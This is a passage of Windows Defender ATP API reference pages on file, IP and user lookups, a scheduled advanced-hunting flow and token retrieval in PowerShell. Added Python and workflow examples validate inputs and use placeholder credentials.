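            "fileType": f.get("fileType"), "threatName": f.get("windowsDefenderAVThreatName"),
            "flags": flags}


SAMPLE_FILE = json.dumps({  # the page's example response
    "@odata.context": API_BASE + "/api/$metadata#Files/$entity",
    "sha1": "6532ec91d513acc05f43ee0aa3002599729fd3e1",
    "sha256": "d4447dffdbb2889b4b4e746b0bc882df1b854101614b0aa83953ef3cb66904cf",
    "md5": "7f05a371d2beffb3784fd2199f81d730",
    "globalPrevalence": 7329,
    "globalFirstObserved": "2018-04-08T05:50:29.4459725Z",
    "globalLastObserved": "2018-08-07T23:35:11.1361328Z",
    "windowsDefenderAVThreatName": None,
    "size": 391680, "fileType": "PortableExecutable", "isPeFile": True,
    "filePublisher": None, "fileProductName": None, "signer": None, "issuer": None,
    "signerHash": None, "isValidCertificate": None,
})
SAMPLE_SUSPECT = json.dumps({  # constructed: signed, but the agent rejected the certificate; rare; AV-detected
    "sha1": "0000000000000000000000000000000000000001",
    "sha256": None, "md5": None,
    "globalPrevalence": 3, "size": 12288, "fileType": "PortableExecutable", "isPeFile": True,
    "signer": "Constructed Publisher Ltd", "issuer": "Constructed CA", "signerHash": "deadbeef",
    "isValidCertificate": False, "windowsDefenderAVThreatName": "Constructed/Sample.A",
})

if __name__ == "__main__":
    print(file_url("6532ec91d513acc05f43ee0aa3002599729fd3e1"))
    for body in (SAMPLE_FILE, SAMPLE_SUSPECT):
        print(assess(body))
```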
Get file related alerts API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of alerts related to a given file hash.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION           PERMISSION DISPLAY NAME
Application                         Alert.Read.All       'Read all alerts'
Application                         Alert.ReadWrite.All  'Read and write all alerts'
Delegated (work or school account)  Alert.Read           'Read alerts'
Delegated (work or school account)  Alert.ReadWrite      'Read and write alerts'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
- The response includes only alerts associated with machines that the user has access to, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/files/{id}/alerts

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful and the file exists, 200 OK with a list of alert entities in the body. If the file does not exist, 404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/alerts

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
  "value": [
    {
      "id": "121688558380765161_2136280442",
      "incidentId": 7696,
      "assignedTo": "secop@contoso.com",
      "severity": "High",
      "status": "New",
      "classification": "TruePositive",
      "determination": "Malware",
      "investigationState": "Running",
      "category": "MalwareDownload",
      "detectionSource": "WindowsDefenderAv",
      "threatFamilyName": "Mikatz",
      "title": "Windows Defender AV detected 'Mikatz', high-severity malware",
      "description": "Some description",
      "alertCreationTime": "2018-11-26T16:19:21.8409809Z",
      "firstEventTime": "2018-11-26T16:17:50.0948658Z",
      "lastEventTime": "2018-11-26T16:18:01.809871Z",
      "resolvedTime": null,
      "machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
    }
  ]
}
Get file related machines API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of machines related to a given file hash.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs.

PERMISSION TYPE                     PERMISSION             PERMISSION DISPLAY NAME
Application                         Machine.Read.All       'Read all machine profiles'
Application                         Machine.ReadWrite.All  'Read and write all machine information'
Delegated (work or school account)  Machine.Read           'Read machine information'
Delegated (work or school account)  Machine.ReadWrite      'Read and write machine information'

NOTE
When obtaining a token using user credentials:
- The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
- The response includes only machines that the user has access to, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/files/{id}/machines

Request headers

NAME           TYPE    DESCRIPTION
Authorization  String  Bearer {token}. Required.

Request body
Empty

Response
If successful and the file exists, 200 OK with a list of machine entities in the body. If the file does not exist, 404 Not Found.

Improve request performance

NOTE
For better performance, you can use a server closer to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

Example
Request
Here is an example of the request.

GET https://api.securitycenter.windows.com/api/files/1e5bc9d7e413ddd7902c2932e418702b84d0cc07/machines

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
  "@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
  "value": [
    {
      "id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
      "computerDnsName": "mymachine1.contoso.com",
      "firstSeen": "2018-08-02T14:55:03.7791856Z",
      "lastSeen": "2018-08-02T14:55:03.7791856Z",
      "osPlatform": "Windows10",
      "osVersion": "10.0.0.0",
      "lastIpAddress": "172.17.230.209",
      "lastExternalIpAddress": "167.220.196.71",
      "agentVersion": "10.5830.18209.1001",
      "osBuild": 18209,
      "healthStatus": "Active",
      "rbacGroupId": 140,
      "riskScore": "Low",
      "aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
      "machineTags":  [ "test tag 1", "test tag 2" ]
    },
    {
      "id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7",
      "computerDnsName": "mymachine2.contoso.com",
      "firstSeen": "2018-07-09T13:22:45.1250071Z",
      "lastSeen": "2018-07-09T13:22:45.1250071Z",
      "osPlatform": "Windows10",
      "osVersion": "10.0.0.0",
      "lastIpAddress": "192.168.12.225",
      "lastExternalIpAddress": "79.183.65.82",
      "agentVersion": "10.5820.17724.1000",
      "osBuild": 17724,
      "healthStatus": "Inactive",
      "rbacGroupId": 140,
      "riskScore": "Low",
      "aadDeviceId": null,
      "machineTags": [ "test tag 1" ]
    }
  ]
}
Get file statistics API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves the prevalence of the given file within the organization.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission      Permission display name
Application                          File.Read.All   'Read file profiles'
Delegated (work or school account)   File.Read.All   'Read file profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)

HTTP request
GET /api/files/{id}/stats

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the file exists: 200 OK with statistical data in the body. If the file does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/files/6532ec91d513acc05f43ee0aa3002599729fd3e1/stats

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgFileStats",
"sha1": "6532ec91d513acc05f43ee0aa3002599729fd3e1",
"orgPrevalence": "3",
"orgFirstSeen": "2018-07-15T06:13:59Z",
"orgLastSeen": "2018-08-03T16:45:21Z",
"topFileNames": [
"chrome_1.exe",
"chrome_2.exe"
]
}
Get IP related alerts API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of alerts related to a given IP address.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission            Permission display name
Application                          Alert.Read.All        'Read all alerts'
Application                          Alert.ReadWrite.All   'Read and write all alerts'
Delegated (work or school account)   Alert.Read            'Read alerts'
Delegated (work or school account)   Alert.ReadWrite       'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
The response includes only alerts associated with machines that the user has access to, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/ips/{ip}/alerts

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the IP exists: 200 OK with a list of alert entities in the body. If the IP does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/ips/10.209.67.177/alerts

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"assignedTo": "secop@contoso.com",
"severity": "Low",
"status": "InProgress",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-25T16:19:21.8409809Z",
"firstEventTime": "2018-11-25T16:17:50.0948658Z",
"lastEventTime": "2018-11-25T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
]
}
Get IP related machines API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of machines that communicated to or from a given IP address.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission              Permission display name
Application                          Machine.Read.All        'Read all machine profiles'
Application                          Machine.ReadWrite.All   'Read and write all machine information'
Delegated (work or school account)   Machine.Read            'Read machine information'
Delegated (work or school account)   Machine.ReadWrite       'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
The response includes only machines that the user has access to, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/ips/{ip}/machines

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the IP exists: 200 OK with a list of machine entities in the body. If the IP does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/ips/10.209.67.177/machines

Response
Here is an example of the response.
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"riskScore": "Low",
"rbacGroupName": "The-A-Team",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
},
{
"id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7",
"computerDnsName": "mymachine2.contoso.com",
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"lastExternalIpAddress": "79.183.65.82",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"healthStatus": "Inactive",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"aadDeviceId": null,
"machineTags": [ "test tag 1" ]
}
]
}
Get IP statistics API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves the prevalence of the given IP address within the organization.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission    Permission display name
Application                          Ip.Read.All   'Read IP address profiles'
Delegated (work or school account)   Ip.Read.All   'Read IP address profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)

HTTP request
GET /api/ips/{ip}/stats

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the IP exists: 200 OK with statistical data in the body. If the IP does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/ips/10.209.67.177/stats

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#microsoft.windowsDefenderATP.api.InOrgIPStats",
"ipAddress": "10.209.67.177",
"orgPrevalence": "63515",
"orgFirstSeen": "2017-07-30T13:36:06Z",
"orgLastSeen": "2017-08-29T13:32:59Z"
}
Was IP seen in org
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Answers whether an IP address was seen in the organization.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission    Permission display name
Application                          Ip.Read.All   'Read IP address profiles'
Delegated (work or school account)   Ip.Read.All   'Read IP address profiles'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (See Create and manage roles for more
information)

HTTP request
GET /api/ips/{ip}

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the IP exists: 200 OK. If the IP does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/ips/10.209.67.177

Response
Here is an example of the response.

HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Ips/$entity",
"id": "10.209.67.177"
}
User resource type
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Method                       Return type          Description
List User related alerts     alert collection     List all the alerts that are associated with a user.
List User related machines   machine collection   List all the machines that were logged on by a user.
Get user related alerts API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of alerts related to a given user ID.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission            Permission display name
Application                          Alert.Read.All        'Read all alerts'
Application                          Alert.ReadWrite.All   'Read and write all alerts'
Delegated (work or school account)   Alert.Read            'Read alerts'
Delegated (work or school account)   Alert.ReadWrite       'Read and write alerts'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
The response includes only alerts associated with machines that the user has access to, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/users/{id}/alerts

NOTE
The id is not the full UPN but only the user name. For example, to retrieve alerts for user1@contoso.com use /api/users/user1/alerts.

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the user exists: 200 OK with a list of alert entities in the body. If the user does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/users/user1/alerts

Response
Here is an example of the response.
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Alerts",
"value": [
{
"id": "441688558380765161_2136280442",
"incidentId": 8633,
"assignedTo": "secop@contoso.com",
"severity": "Low",
"status": "InProgress",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-25T16:19:21.8409809Z",
"firstEventTime": "2018-11-25T16:17:50.0948658Z",
"lastEventTime": "2018-11-25T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
},
{
"id": "121688558380765161_2136280442",
"incidentId": 4123,
"assignedTo": "secop@contoso.com",
"severity": "Low",
"status": "InProgress",
"classification": "TruePositive",
"determination": "Malware",
"investigationState": "Running",
"category": "MalwareDownload",
"detectionSource": "WindowsDefenderAv",
"threatFamilyName": "Mikatz",
"title": "Windows Defender AV detected 'Mikatz', high-severity malware",
"description": "Some description",
"alertCreationTime": "2018-11-24T16:19:21.8409809Z",
"firstEventTime": "2018-11-24T16:17:50.0948658Z",
"lastEventTime": "2018-11-24T16:18:01.809871Z",
"resolvedTime": null,
"machineId": "9d80fbbc1bdbc5ce968f1d37c72384cbe17ee337"
}
]
}
Get user related machines API
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Retrieves a collection of machines related to a given user ID.

Permissions
One of the following permissions is required to call this API. To learn more, including how to choose permissions,
see Use Windows Defender ATP APIs

Permission type                      Permission              Permission display name
Application                          Machine.Read.All        'Read all machine profiles'
Application                          Machine.ReadWrite.All   'Read and write all machine information'
Delegated (work or school account)   Machine.Read            'Read machine information'
Delegated (work or school account)   Machine.ReadWrite       'Read and write machine information'

NOTE
When obtaining a token using user credentials:
The user needs to have at least the following role permission: 'View Data' (see Create and manage roles for more information).
The response includes only machines that the user can access, based on machine group settings (see Create and manage machine groups for more information).

HTTP request
GET /api/users/{id}/machines

NOTE
The id is not the full UPN but only the user name. For example, to retrieve machines for user1@contoso.com use /api/users/user1/machines.

Request headers
Name            Type     Description
Authorization   String   Bearer {token}. Required.

Request body
Empty

Response
If successful and the user exists: 200 OK with a list of machine entities in the body. If the user does not exist: 404 Not Found.

Example
Request
Here is an example of the request.

Improve request performance

NOTE
For better performance, use the server closest to your geographic location:
api-us.securitycenter.windows.com
api-eu.securitycenter.windows.com
api-uk.securitycenter.windows.com

GET https://api.securitycenter.windows.com/api/users/user1/machines

Response
Here is an example of the response.
HTTP/1.1 200 OK
Content-type: application/json
{
"@odata.context": "https://api.securitycenter.windows.com/api/$metadata#Machines",
"value": [
{
"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07",
"computerDnsName": "mymachine1.contoso.com",
"firstSeen": "2018-08-02T14:55:03.7791856Z",
"lastSeen": "2018-08-02T14:55:03.7791856Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "172.17.230.209",
"lastExternalIpAddress": "167.220.196.71",
"agentVersion": "10.5830.18209.1001",
"osBuild": 18209,
"healthStatus": "Active",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"aadDeviceId": "80fe8ff8-2624-418e-9591-41f0491218f9",
"machineTags": [ "test tag 1", "test tag 2" ]
},
{
"id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7",
"computerDnsName": "mymachine2.contoso.com",
"firstSeen": "2018-07-09T13:22:45.1250071Z",
"lastSeen": "2018-07-09T13:22:45.1250071Z",
"osPlatform": "Windows10",
"osVersion": "10.0.0.0",
"lastIpAddress": "192.168.12.225",
"lastExternalIpAddress": "79.183.65.82",
"agentVersion": "10.5820.17724.1000",
"osBuild": 17724,
"healthStatus": "Inactive",
"rbacGroupId": 140,
"rbacGroupName": "The-A-Team",
"riskScore": "Low",
"aadDeviceId": null,
"machineTags": [ "test tag 1" ]
}
]
}
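The file, IP and user lookups described in the preceding API topics all have the same shape: a GET with a bearer token that returns 200 OK with the entity (or a "value" collection) and 404 Not Found when the entity was never seen in the organization. The Python helpers below are an added example, not code from the original page. They build the request URLs (including the regional hosts), validate each path parameter before it is sent (a hex hash for files, an IP literal for IPs, a bare user name rather than a UPN for users, as the notes above require) and map the two status codes to a result. The send callable is injected so the script runs offline: fake_send and its responses are constructed from trimmed copies of the page's own examples, and the assumption that file ids are SHA-1 or SHA-256 hex is mine. Replace fake_send with an authenticated GET using a token obtained as shown in the PowerShell and Python samples on this page.

```python
import ipaddress
import json
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import quote

# Global and regional API hosts listed on the page.
BASE_URLS = {
    "global": "https://api.securitycenter.windows.com",
    "us": "https://api-us.securitycenter.windows.com",
    "eu": "https://api-eu.securitycenter.windows.com",
    "uk": "https://api-uk.securitycenter.windows.com",
}

# Assumption: file ids are hex hashes (the page's examples are SHA-1; 64 hex characters
# is allowed here for SHA-256). Tighten or relax this to match what you actually pass.
FILE_ID_RE = re.compile(r"^([0-9a-fA-F]{40}|[0-9a-fA-F]{64})$")

Response = Tuple[int, str]          # (HTTP status, body text)
Sender = Callable[[str], Response]  # performs an authenticated GET; injected so this runs offline


def file_url(base: str, file_id: str, suffix: str) -> str:
    """GET /api/files/{id}/machines or /api/files/{id}/stats."""
    if not FILE_ID_RE.match(file_id):
        raise ValueError("file id must be a hex SHA-1 or SHA-256 hash")
    return f"{base}/api/files/{file_id}/{suffix}"


def ip_url(base: str, ip: str, suffix: str = "") -> str:
    """GET /api/ips/{ip}, /api/ips/{ip}/alerts, /api/ips/{ip}/machines or /api/ips/{ip}/stats."""
    ipaddress.ip_address(ip)  # raises ValueError for anything that is not an IP literal
    return f"{base}/api/ips/{ip}/{suffix}".rstrip("/")


def user_url(base: str, user: str, suffix: str) -> str:
    """GET /api/users/{id}/alerts or /api/users/{id}/machines.

    The page notes that {id} is the user name only, not the UPN; rejecting
    user1@contoso.com here beats a silent 404 for a user that does exist.
    """
    if not user or "@" in user or "\\" in user:
        raise ValueError("user id must be the bare user name, not a UPN or DOMAIN\\user")
    return f"{base}/api/users/{quote(user, safe='')}/{suffix}"


def lookup(send: Sender, url: str) -> Optional[List[Dict]]:
    """Entity list on 200 OK; None on 404 (entity never seen in the org); raise otherwise."""
    status, body = send(url)
    if status == 404:
        return None
    if status != 200:
        raise RuntimeError(f"{url} -> HTTP {status}: {body[:200]}")
    data = json.loads(body)
    # Collections are wrapped in "value"; single entities such as /api/ips/{ip} are not.
    return data["value"] if "value" in data else [data]


def active_machines_for_ip(send: Sender, ip: str, region: str = "global") -> List[str]:
    """Ids of machines that communicated with `ip` and are still reporting (healthStatus Active)."""
    machines = lookup(send, ip_url(BASE_URLS[region], ip, "machines")) or []
    return [m["id"] for m in machines if m.get("healthStatus") == "Active"]


# Constructed responses, trimmed from the examples on this page, so the script runs offline.
_FAKE_RESPONSES = {
    "/api/ips/10.209.67.177": (200, json.dumps({"id": "10.209.67.177"})),
    "/api/ips/10.209.67.177/machines": (200, json.dumps({"value": [
        {"id": "1e5bc9d7e413ddd7902c2932e418702b84d0cc07", "healthStatus": "Active"},
        {"id": "7292e4b8cb74ff1cc3d8a495eb29dc8858b732f7", "healthStatus": "Inactive"},
    ]})),
    "/api/users/user1/alerts": (200, json.dumps({"value": [
        {"id": "441688558380765161_2136280442", "severity": "Low", "status": "InProgress"},
    ]})),
}


def fake_send(url: str) -> Response:
    """Stand-in for an HTTP GET with a bearer token; unknown paths get the API's 404."""
    path = url.split("securitycenter.windows.com", 1)[1]
    return _FAKE_RESPONSES.get(path, (404, '{"error": {"code": "NotFound"}}'))


if __name__ == "__main__":
    print(active_machines_for_ip(fake_send, "10.209.67.177"))
    print(lookup(fake_send, ip_url(BASE_URLS["eu"], "192.0.2.1")))  # None: never seen in the org
    print(lookup(fake_send, user_url(BASE_URLS["global"], "user1", "alerts")))
```

Validating the path parameter before the call also keeps unexpected input (a UPN, a path fragment, a malformed hash) from being sent under your token; the RBAC scoping described in the notes above still applies on the server side, so a 404 may also mean the entity exists but only on machines your account cannot see.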
Schedule Advanced Hunting using Microsoft Flow
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Schedule an advanced hunting query.

Before you begin
You first need to create an app.

Use case
A common scenario is scheduling an advanced hunting query and using the results for follow-up actions and processing.
In this section we share a sample for this purpose using Microsoft Flow (or Logic Apps).

Define a flow to run query and parse results
Use the following basic flow as an example.
1. Define the trigger: Recurrence by time.
2. Add an action: select HTTP and configure it as follows.
   Set the method to POST.
   Set the URI to https://api.securitycenter.windows.com/api/advancedqueries/run or one of the region-specific locations:
   US: https://api-us.securitycenter.windows.com/api/advancedqueries/run
   Europe: https://api-eu.securitycenter.windows.com/api/advancedqueries/run
   United Kingdom: https://api-uk.securitycenter.windows.com/api/advancedqueries/run
   Add the header Content-Type: application/json.
   In the body, send a JSON object whose Query property holds your query. The original screenshot wrapped the query in single quotation marks ('); the PowerShell and Python samples on this page send it as a standard double-quoted JSON string.
   In the Advanced options, set Authentication to Active Directory OAuth.
   Set Tenant to your AAD tenant ID.
   Set Audience to https://api.securitycenter.windows.com.
   Set Client ID to your application ID.
   Set Credential Type to Secret.
   Set Secret to the application secret generated in Azure Active Directory. Treat anyone who can edit the flow as able to read this value.
3. Use the "Parse JSON" action to get the schema of the data: choose "Use sample payload to generate schema" and paste in a copy of the expected result.
Expand the flow to use the query results
The following section shows how to use the parsed results to insert them into a SQL database.
This is an example only; you can use other actions supported by Microsoft Flow.
Add an 'Apply to each' action.
Select the Results JSON (the output of the last Parse JSON action).
Add an 'Insert row' action; you will need to supply the connection details.
Select the table you want to update and define the mapping between the Windows Defender ATP output and the SQL columns. Note that it is possible to manipulate the data inside the flow; in the example, the type of EventTime was changed.

The SQL table receives new rows on every run and can be used for correlation with other data sources. You can now read from your table:
Full flow definition
You can find below the full definition
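The steps above expressed as a workflow definition. This is an added example, not the page's own full flow definition (which was shown as a screenshot): Microsoft Flow and Logic Apps share the same workflow definition language, so the recurrence trigger, the HTTP action with Active Directory OAuth authentication and the Parse JSON action map directly onto the settings listed. The tenant, client ID and secret are placeholders, and the Parse JSON schema only describes the Schema and Results envelope that the advanced hunting response carries. The 'Insert row' step needs a SQL connection specific to your environment, so the loop here uses a Compose action as a stand-in and only shows the EventTime conversion with formatDateTime. Anyone who can read this definition can read the secret inside it.

```json
{
  "$schema": "https://schema.management.azure.com/providers/Microsoft.Logic/schemas/2016-06-01/workflowdefinition.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {},
  "triggers": {
    "Recurrence": {
      "type": "Recurrence",
      "recurrence": { "frequency": "Hour", "interval": 1 }
    }
  },
  "actions": {
    "HTTP": {
      "type": "Http",
      "runAfter": {},
      "inputs": {
        "method": "POST",
        "uri": "https://api.securitycenter.windows.com/api/advancedqueries/run",
        "headers": { "Content-Type": "application/json" },
        "body": { "Query": "RegistryEvents | where EventTime > ago(1h) | limit 100" },
        "authentication": {
          "type": "ActiveDirectoryOAuth",
          "tenant": "00000000-0000-0000-0000-000000000000",
          "audience": "https://api.securitycenter.windows.com",
          "clientId": "11111111-1111-1111-1111-111111111111",
          "secret": "22222222-2222-2222-2222-222222222222"
        }
      }
    },
    "Parse_JSON": {
      "type": "ParseJson",
      "runAfter": { "HTTP": [ "Succeeded" ] },
      "inputs": {
        "content": "@body('HTTP')",
        "schema": {
          "type": "object",
          "properties": {
            "Schema": {
              "type": "array",
              "items": {
                "type": "object",
                "properties": { "Name": { "type": "string" }, "Type": { "type": "string" } }
              }
            },
            "Results": { "type": "array", "items": { "type": "object" } }
          }
        }
      }
    },
    "For_each_result": {
      "type": "Foreach",
      "runAfter": { "Parse_JSON": [ "Succeeded" ] },
      "foreach": "@body('Parse_JSON')?['Results']",
      "actions": {
        "Compose_row": {
          "type": "Compose",
          "inputs": {
            "EventTime": "@formatDateTime(items('For_each_result')?['EventTime'], 'yyyy-MM-ddTHH:mm:ss')",
            "MachineId": "@items('For_each_result')?['MachineId']"
          }
        }
      }
    }
  },
  "outputs": {}
}
```

The query window (ago(1h)) matches the one-hour recurrence so consecutive runs do not re-insert the same events; widen one only together with the other.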
Related topic
Windows Defender ATP APIs
Advanced Hunting API
Advanced Hunting using PowerShell
Advanced Hunting using PowerShell
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
Run advanced hunting queries using PowerShell. Read the Advanced Hunting API topic first.
In this section we share PowerShell samples to retrieve a token and use it to run a query.

Before you begin


You first need to create an app.

Preparation instructions
Open a PowerShell window.
If your execution policy does not allow you to run the PowerShell commands, you can relax it for the current process only, so the change does not persist after the window is closed:
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process

For more details, see the PowerShell documentation.

Get token
Run the following:

$tenantId = '00000000-0000-0000-0000-000000000000' # Paste your own tenant ID here
$appId = '11111111-1111-1111-1111-111111111111' # Paste your own app ID here
$appSecret = '22222222-2222-2222-2222-222222222222' # Paste your own app secret here

# Request an app-only (client credentials) token for the Windows Defender ATP resource
$resourceAppIdUri = 'https://api.securitycenter.windows.com'
$oAuthUri = "https://login.windows.net/$tenantId/oauth2/token"
$body = [Ordered] @{
